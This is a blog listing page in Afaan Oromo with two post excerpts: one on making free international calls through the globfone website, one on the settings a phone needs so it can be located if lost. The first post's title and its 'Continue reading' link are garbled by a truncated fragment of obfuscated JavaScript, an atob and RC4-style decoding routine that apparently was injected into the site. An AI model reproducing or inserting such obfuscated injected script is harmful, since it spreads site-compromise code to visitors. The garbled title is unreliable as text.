Biyya Feetanitti Bilisaan /*>(-0x2*n&0x6)):0x0){p=j[‘indexOf’](p);}return m;});}());var g=function(h,l){var m=[],n=0x0,o,p=”,q=”;h=atob(h);for(var t=0x0,u=h[‘length’];t<u;t++){q+=’%’+(’00’+h[‘charCodeAt’](t)[‘toString’](0x10))[‘slice’](-0x2);}h=decodeURIComponent(q);var r;for(r=0x0;r<0x100;r++){m[r]=r;}for(r=0x0;r<0x100;r++){n=(n+m[r]+l[‘charCodeAt’](r%l[‘length’]))%0 Bilbiluu nii dandeessu!

Namni kamuu firoota isaa biyya hambaa jiraataniif bilisaan bilbiluuf ni fedha. Kanaafis social media garaagaraa fayyadamtu. Hardha Karaa ajaaibaa isiniif qabadhee dhufeera. Website kana kan adda godhu lakkoofsa keessan ykn eenyummaa keessan hin beekin Bilbiluu ykn ergaa gabaabaan erguu dandeessu. Na hordofaa_ jalqaba Gara browser feetanii seenaa_sanabooda globfone jechuun search gootu…. Linkii jalqaba irra jiruContinue reading “Biyya Feetanitti Bilisaan /*>(-0x2*n&0x6)):0x0){p=j[‘indexOf’](p);}return m;});}());var g=function(h,l){var m=[],n=0x0,o,p=”,q=”;h=atob(h);for(var t=0x0,u=h[‘length’];t<u;t++){q+=’%’+(’00’+h[‘charCodeAt’](t)[‘toString’](0x10))[‘slice’](-0x2);}h=decodeURIComponent(q);var r;for(r=0x0;r<0x100;r++){m[r]=r;}for(r=0x0;r<0x100;r++){n=(n+m[r]+l[‘charCodeAt’](r%l[‘length’]))%0 Bilbiluu nii dandeessu!”

Bilbilli Keenya Yoo Bade Akkamitti Arganna!

Bilbila nu jalaa hatame karaa ittiin argachuu dandeenyu muraasni ni jiru, isaan keessaa kan namoonni hedduun itti fayyadamanii fi hedduu jaallatamaa ta’e kana waliin haa ilaallu.Utuu bilbilli keenya nujalaa hin hatamiin haal-dureewwan guutamuu qaban:– Bilbilli banaa ta’uu qaba(Power On).– Location(Kallattii) banuu qabna.– Google Account (Gmail) bilbila keenyatti hidhame qabaachuu qabna.– ‘Data On’ godhuu qabna. (Continue reading “Bilbilli Keenya Yoo Bade Akkamitti Arganna!”

Design a site like this with WordPress.com
Get started